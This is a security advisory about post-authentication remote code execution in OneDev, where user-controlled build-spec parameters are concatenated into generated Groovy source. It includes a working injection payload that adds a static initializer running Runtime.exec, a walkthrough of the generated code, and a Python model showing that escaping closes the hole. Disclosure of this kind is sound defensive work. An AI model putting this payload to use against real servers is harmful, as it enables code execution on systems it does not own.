Impact
InputSpec is used to define parameters of a Build spec. It does so by using dynamically generated Groovy classes. A user able to control job parameters can run arbitrary code on OneDev's server by injecting arbitrary Groovy code.
For example, for text parameters the class TextInput is used, which dynamically builds fields and method annotations:
buffer.append(" @Pattern(regexp=\"" + pattern + "\", message=\"Should match regular expression: " + pattern + "\")\n");
Where pattern can be controlled by the user as part of the build spec. For example, to execute arbitrary Groovy code, you can define the following pattern:
paramSpecs:
- !TextParam
name: test
description: test
allowEmpty: false
pattern: foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //
The payload used is:
foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //
Which, when injected, will result in:
...
@Pattern(regexp="foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} // ", message="Should match regular expression: foo") public String foo() {return "";}; static {Runtime.getRuntime().exec("touch /tmp/pwned1");} // ")
public String input1() {
...
}
The first `"` of the payload closes the regexp string literal, the trailing `//` turns the rest of the generated line (including the second copy of the payload in the message attribute) into a comment. When we remove the commented-out text and tidy the layout, we get:
@Pattern(regexp="foo")
public String foo() {return "";};
static {Runtime.getRuntime().exec("touch /tmp/pwned1");}
public String input1() {
...
}
Resulting in the injection of a static initializer block that runs our arbitrary code as soon as the generated class is loaded. Injection is not only possible in text patterns, but in many other parameters that are concatenated into the generated source.
This issue may lead to post-auth RCE by any user who is allowed to edit a build spec.
Patches
This issue was addressed in 4.0.3 by escaping special characters such as quotes in user input before it is inserted into the generated Groovy source.
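The following is an added example, not OneDev's code, that models the string concatenation quoted above and the escaping fix described under Patches. It rebuilds the @Pattern annotation line from a user-controlled pattern, once as the vulnerable concatenation and once with quotes, backslashes and line breaks escaped, then runs a small tokenizer that discards string literals and // comments (the way the Groovy compiler would see the line) to show which statements survive outside the annotation. The helper names (build_annotation_unsafe, build_annotation_safe, escape_java_string, leaks_code) and the exact escaping rules are assumptions for illustration; the payload is the one from this advisory.

```python
# Added example: models the vulnerable concatenation and an escaping fix.
# None of this is OneDev's own code; names and escaping rules are illustrative.

# Payload from the advisory: closes the regexp literal, adds a method and a
# static initializer, and comments out the rest of the generated line.
PAYLOAD = ('foo") public String foo() {return "";}; '
           'static {Runtime.getRuntime().exec("touch /tmp/pwned1");} //')

# What the generated line looks like once every string literal is blanked:
# only the annotation itself should remain.
EXPECTED_SHAPE = ' @Pattern(regexp="", message="")\n'


def build_annotation_unsafe(pattern: str) -> str:
    """Mirror of the quoted buffer.append(...) line: raw concatenation."""
    return (' @Pattern(regexp="' + pattern
            + '", message="Should match regular expression: ' + pattern + '")\n')


def escape_java_string(s: str) -> str:
    """Escape characters that can end or break a Java/Groovy string literal."""
    table = {'\\': '\\\\', '"': '\\"', '\n': '\\n', '\r': '\\r'}
    return ''.join(table.get(ch, ch) for ch in s)


def unescape_java_string(s: str) -> str:
    """Inverse of escape_java_string, used to check the pattern round-trips."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '\\' and i + 1 < len(s):
            out.append({'n': '\n', 'r': '\r'}.get(s[i + 1], s[i + 1]))
            i += 2
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def build_annotation_safe(pattern: str) -> str:
    """Same template, but the user value is escaped before insertion."""
    p = escape_java_string(pattern)
    return (' @Pattern(regexp="' + p
            + '", message="Should match regular expression: ' + p + '")\n')


def strip_literals_and_comments(src: str) -> str:
    """Blank out double-quoted literals (honouring backslash escapes) and
    // line comments, leaving only the tokens a compiler would treat as code."""
    out, i, n = [], 0, len(src)
    while i < n:
        c = src[i]
        if c == '"':
            i += 1
            while i < n and src[i] != '"':
                if src[i] == '\\':
                    i += 1          # skip the escaped character
                i += 1
            i += 1                  # skip the closing quote
            out.append('""')
        elif src.startswith('//', i):
            while i < n and src[i] != '\n':
                i += 1              # drop the comment, keep the newline
        else:
            out.append(c)
            i += 1
    return ''.join(out)


def leaks_code(generated_line: str) -> bool:
    """True if anything other than the intended annotation survives as code."""
    return strip_literals_and_comments(generated_line) != EXPECTED_SHAPE


if __name__ == '__main__':
    for label, builder in (('unsafe', build_annotation_unsafe),
                           ('safe', build_annotation_safe)):
        line = builder(PAYLOAD)
        print(f'{label}: injected code = {leaks_code(line)}')
        print('  compiler sees:', strip_literals_and_comments(line).rstrip())
```

With the raw concatenation the stripped line still contains `public String foo() ...` and `static {...}`, i.e. two new class members; with escaping the whole payload stays inside the two string literals and the stripped line is exactly the annotation. The round trip through unescape_java_string shows that escaping does not change the regular expression the annotation ends up with. In a real Java code base you would use an existing routine such as Apache Commons Text's StringEscapeUtils.escapeJava rather than hand-rolling the table above, and keep in mind that Groovy double-quoted strings also interpolate `$`, which this toy model does not cover.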
Credits
This issue was discovered by @pwntester